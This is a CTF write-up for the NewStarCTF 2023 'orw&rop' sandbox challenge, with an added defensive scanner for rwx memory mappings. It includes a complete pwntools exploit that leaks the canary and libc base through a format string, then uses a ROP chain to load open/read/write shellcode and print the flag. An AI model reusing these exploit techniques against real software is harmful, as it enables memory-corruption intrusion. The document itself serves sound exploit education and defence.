NewStarCTF 2023 public track: orw&rop
A sandbox challenge. The sandbox only disables execve, so an orw (open/read/write) shellcode is enough to read the flag.
Approach
- The program mmaps a region with protection 7 (readable, writable and executable). We place the orw shellcode there and then redirect the program's control flow (the rip register) to it.
- The first input has a format string vulnerability. We use it to leak the libc base (via the address of __libc_start_main left on the stack) and the canary, which we need for the stack overflow later.
- The second input has a stack overflow. To get the orw shellcode into the mmap'd region we need a call to read, namely read(0, target_addr, 0x1000). So the stack overflow is used to run a ROP chain that calls read, reads the orw shellcode into target_addr, and then returns into it.
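The only thing that makes the second stage possible is the rwx anonymous mapping. As an added check, not part of the original writeup, here is a small scanner over /proc/<pid>/maps that flags such mappings; the maps text below is constructed to look like the challenge process (the 0x66660000 region is the one the writeup uses, the other lines are made up).

```python
import re

# Constructed sample of /proc/<pid>/maps for a process like the challenge
# binary. 0x66660000 is the mmap'd rwx page from the writeup; the rest is
# made-up filler in the real maps format: address perms offset dev inode path.
SAMPLE_MAPS = """\
00400000-00401000 r--p 00000000 08:01 1234    /home/ctf/pwn
00401000-00402000 r-xp 00001000 08:01 1234    /home/ctf/pwn
00402000-00403000 r--p 00002000 08:01 1234    /home/ctf/pwn
00403000-00404000 rw-p 00003000 08:01 1234    /home/ctf/pwn
66660000-66661000 rwxp 00000000 00:00 0
7ffff7d80000-7ffff7da8000 r--p 00000000 08:01 5678    /usr/lib/x86_64-linux-gnu/libc.so.6
7ffff7da8000-7ffff7f3d000 r-xp 00028000 08:01 5678    /usr/lib/x86_64-linux-gnu/libc.so.6
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0       [stack]
"""

MAPS_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) (\S{4}) \S+ \S+ \S+\s*(.*)$")


def parse_maps(text):
    """Parse /proc/<pid>/maps text into a list of region dicts."""
    regions = []
    for line in text.splitlines():
        m = MAPS_RE.match(line)
        if not m:
            continue
        start, end, perms, path = m.groups()
        regions.append({
            "start": int(start, 16),
            "end": int(end, 16),
            "perms": perms,
            "path": path.strip() or "[anon]",
        })
    return regions


def find_rwx(regions):
    """Return regions that are readable, writable and executable at once."""
    return [r for r in regions if r["perms"][:3] == "rwx"]


def scan_pid(pid):
    """Read a live process's maps and report its rwx regions."""
    with open(f"/proc/{pid}/maps") as f:
        return find_rwx(parse_maps(f.read()))


if __name__ == "__main__":
    for r in find_rwx(parse_maps(SAMPLE_MAPS)):
        print(f"rwx mapping {r['start']:#x}-{r['end']:#x} {r['path']}")
```

Run with a real pid via scan_pid(pid) to confirm whether a binary leaves an rwx region around at runtime; a region like this is what an NX bit is supposed to rule out.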
Exploit
from pwn import *
from pwn import p64, u64, p32, u32, p8

context.terminal = ["tmux", "sp", "-h"]
context(log_level="debug", os="linux", arch="amd64")

# io = remote('node5.buuoj.cn', 27743)
io = process("./pwn")
elf = ELF("./pwn")
libc = ELF('/ctf/tools/libc.so.6')

sla = lambda x, y: io.sendlineafter(x, y)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sd = lambda x: io.send(x)
gd = lambda: gdb.attach(io)
inter = lambda: io.interactive()


def get_addr():
    # Receive a leaked 64-bit address up to its 0x7f high byte and unpack it
    return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))


def pwn():
    pause()
    # First input: format string leak of the canary (%11$p) and of
    # __libc_start_main+128 (%33$p)
    sla(b"sandbox", b"aa%11$pbb%33$p")
    io.recvuntil(b"aa")
    canary = int(io.recv(18), 16)                 # "0x" + 16 hex digits
    print("canary ----> " + hex(canary))
    io.recvuntil(b"bb")
    libc_start_main = int(io.recv(14), 16) - 128  # "0x" + 12 hex digits
    print("libc_start_main+128 -----> " + hex(libc_start_main + 128))
    libc_base = libc_start_main - libc.sym["__libc_start_main"]

    # Gadget offsets for this libc, plus the rwx mmap region
    pop_rdi = 0x000000000002a3e5 + libc_base
    pop_rsi = 0x000000000002be51 + libc_base
    pop_rdx_r12 = 0x000000000011f497 + libc_base
    read = libc_base + libc.sym["read"]
    addr = 0x66660000
    length = 0x1000  # named `length` so the builtin len() is not shadowed

    # Second input: stack overflow. The ROP chain calls read(0, addr, length)
    # and then returns into addr, where the shellcode lands.
    payload = b"a" * (0x30 - 8) + p64(canary) + b"a" * 8
    payload += p64(pop_rdi) + p64(0)
    payload += p64(pop_rsi) + p64(addr)
    payload += p64(pop_rdx_r12) + p64(length) + p64(0)
    payload += p64(read) + p64(addr)
    pause()
    sla(b"now", payload)

    # orw shellcode: open("flag"), read it into addr+0x500, write it to stdout
    shellcode = shellcraft.open("flag")
    shellcode += shellcraft.read(3, addr + 0x500, 0x100)
    shellcode += shellcraft.write(1, addr + 0x500, 0x100)
    shellcode = asm(shellcode)
    pause()
    sl(shellcode)
    inter()


pwn()
Anyone with questions is welcome to get in touch and discuss.